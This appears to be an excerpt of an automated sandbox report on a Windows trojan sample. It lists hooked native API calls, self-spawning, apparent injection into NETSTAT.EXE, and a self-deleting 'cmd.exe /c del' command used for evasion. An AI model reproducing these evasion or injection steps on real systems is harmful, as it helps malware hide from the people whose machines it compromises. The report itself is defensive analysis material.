            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_004186E0 NtClose
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_00418790 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_004185AA NtCreateFile
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_004186DA NtClose
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_0041878A NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9540 NtReadFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C99A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C95D0 NtClose, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C98F0 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C97A0 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9A00 NtProtectVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9A20 NtResumeThread, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C96E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011CAD30 NtSetContextThread
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9520 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9950 NtQueueApcThread
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9560 NtWriteFile
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C99D0 NtCreateProcessEx
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C95F0 NtQueryInformationFile
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9820 NtEnumerateKey
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011CB040 NtSuspendThread
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C98A0 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011CA710 NtOpenProcessToken
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9B00 NtSetValueKey
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9730 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9770 NtSetInformationFile
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011CA770 NtOpenThread
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9760 NtOpenProcess
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011CA3B0 NtGetContextThread
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9610 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9A10 NtQuerySection
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9650 NtQueryValueKey
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9670 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C9A80 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe; Code function: 6_2_011C96D0 NtCreateKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D896D0 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D896E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89650 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D895D0 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D899A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89540 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89A80 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89670 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89610 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89A10 NtQuerySection
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89A00 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89A20 NtResumeThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D8A3B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D897A0 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89770 NtSetInformationFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D8A770 NtOpenThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89760 NtOpenProcess
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D8A710 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89B00 NtSetValueKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89730 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D898F0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D898A0 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D8B040 NtSuspendThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89820 NtEnumerateKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D899D0 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D895F0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89950 NtQueueApcThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89560 NtWriteFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D8AD30 NtSetContextThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_02D89520 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D85B0 NtCreateFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D8660 NtReadFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D86E0 NtClose
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D8790 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D85AA NtCreateFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D86DA NtClose
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 18_2_003D878A NtAllocateVirtualMemory
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp; Binary or memory string: OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp; Binary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.287588690.00000000070D0000.00000004.00020000.sdmp; Binary or memory string: OriginalFilenameUI.dll< vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000005.00000002.272314311.00000000003AE000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000000.272808507.000000000066E000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371649875.000000000127F000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp; Binary or memory string: OriginalFilenamenetstat.exej% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe; Binary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Fu94e0b1TR.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Fu94e0b1TR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE

            Data Obfuscation:

            .NET